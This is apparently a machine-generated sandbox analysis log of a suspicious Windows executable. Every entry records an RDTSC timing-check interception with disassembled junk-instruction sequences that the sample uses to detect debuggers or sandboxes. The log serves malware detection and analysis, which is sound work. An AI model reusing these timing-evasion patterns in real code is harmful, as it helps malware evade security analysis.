Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6E8C6 second address: A6E8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6ECA4 second address: A6ECAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A6ECAA second address: A6ECBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007FFA692CA41Eh 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7632B second address: A76336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFA68B945B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76336 second address: A76361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA425h 0x00000009 jmp 00007FFA692CA422h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76361 second address: A76365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76365 second address: A7637F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFA692CA41Ah 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7637F second address: A7638B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA68B945B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A7678D second address: A76791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76791 second address: A767B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFA68B945C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767B0 second address: A767B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767B4 second address: A767B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767B8 second address: A767C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A767C2 second address: A767D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FFA68B945B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76961 second address: A76971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76971 second address: A76975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76975 second address: A76994 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA428h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76994 second address: A7699A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A76B2A second address: A76B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A56DE1 second address: A56DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0A4F0 second address: A0A50A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA425h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0A50A second address: A0A512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A0A512 second address: A0A518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CCB second address: A48CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CCF second address: A48CE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CE2 second address: A48CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A48CE7 second address: A29ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA424h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f lea eax, dword ptr [ebp+12490A40h] 0x00000015 mov ecx, dword ptr [ebp+12455844h] 0x0000001b push eax 0x0000001c jno 00007FFA692CA41Eh 0x00000022 mov dword ptr [esp], eax 0x00000025 sub dword ptr [ebp+12455C40h], edi 0x0000002b call dword ptr [ebp+122D25B0h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FFA692CA429h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A493C0 second address: A493C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A493C4 second address: A493CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59CEA second address: A59CF6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: A59CF6 second address: A59CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A59DAC second address: A59DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A59DB1 second address: A59DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA424h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FFA692CA425h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A5AC7D second address: A5AC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A5AC81 second address: A5AC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A497CC second address: A49824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FFA68B945B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFA68B945B8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000004h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FFA68B945B8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 sbb edi, 6BBAD400h 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A49824 second address: A49828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A49828 second address: A49836 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A49BFC second address: A49C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A49F98 second address: A4A017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFA68B945B6h 0x0000000a popad 0x0000000b jmp 00007FFA68B945BAh 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FFA68B945B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e lea eax, dword ptr [ebp+12490A84h] 0x00000034 sub dword ptr [ebp+122D1F0Bh], ecx 0x0000003a nop 0x0000003b pushad 0x0000003c jmp 00007FFA68B945C3h 0x00000041 jmp 00007FFA68B945C9h 0x00000046 popad 0x00000047 push eax 0x00000048 pushad 0x00000049 pushad 0x0000004a jnc 00007FFA68B945B6h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7D8F7 second address: A7D8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7D8FD second address: A7D907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFA68B945B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7D907 second address: A7D90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7DA4B second address: A7DA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7DCD6 second address: A7DCF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FFA692CA416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007FFA692CA416h 0x00000015 jo 00007FFA692CA416h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7DCF2 second address: A7DCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7DCFA second address: A7DCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7DCFE second address: A7DD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FFA68B945BCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FFA68B945C4h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7E121 second address: A7E13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FFA692CA429h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7E13F second address: A7E14E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jns 00007FFA68B945B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A7E14E second address: A7E154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A83A5B second address: A83A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA68B945C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FFA68B945C0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A83BDD second address: A83C26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FFA692CA416h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e js 00007FFA692CA42Dh 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FFA692CA425h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FFA692CA427h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A83C26 second address: A83C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007FFA68B945C7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A840A5 second address: A840BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA423h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A84242 second address: A8425E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A8425E second address: A8427E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 jnp 00007FFA692CA416h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A846EA second address: A846F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFA68B945B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A846F6 second address: A846FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A846FA second address: A84700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 9F9BEE second address: 9F9BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 9F9BF2 second address: 9F9BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A8D6CD second address: A8D6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A8D6D1 second address: A8D6D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A8D6D5 second address: A8D6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FFA692CA422h 0x0000000e je 00007FFA692CA416h 0x00000014 ja 00007FFA692CA416h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A8D200 second address: A8D22D instructions: 0x00000000 rdtsc 0x00000002 js 00007FFA68B945B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFA68B945C9h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A8D47C second address: A8D480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A92995 second address: A9299A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9299A second address: A929A9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFA692CA41Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A929A9 second address: A929AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A92B35 second address: A92B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A92B3F second address: A92B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA68B945C7h 0x0000000c jmp 00007FFA68B945BBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A92D03 second address: A92D16 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFA692CA41Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FFA692CA416h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A92FF7 second address: A92FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A49A3A second address: A49A7D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA692CA416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FFA692CA418h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000004h 0x00000029 jmp 00007FFA692CA421h 0x0000002e nop 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A49A7D second address: A49ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA68B945C2h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFA68B945C6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FFA68B945C8h 0x0000001d jmp 00007FFA68B945C2h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A93297 second address: A932A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A97F32 second address: A97F6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA68B945BCh 0x00000008 je 00007FFA68B945BEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C6h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A97F6C second address: A97F88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FFA692CA424h 0x0000000e jmp 00007FFA692CA41Ch 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A97F88 second address: A97FC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA68B945BBh 0x00000008 jmp 00007FFA68B945BEh 0x0000000d jmp 00007FFA68B945C3h 0x00000012 popad 0x00000013 jo 00007FFA68B945C2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A97FC0 second address: A97FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A98114 second address: A98119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A983F1 second address: A98401 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFA692CA416h 0x00000008 js 00007FFA692CA416h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A98401 second address: A9840D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFA68B945B6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A9840D second address: A98411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A98411 second address: A9841A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A986B3 second address: A986BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: A986BD second address: A986EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FFA68B945C8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jbe 00007FFA68B945B6h 0x0000001e rdtsc
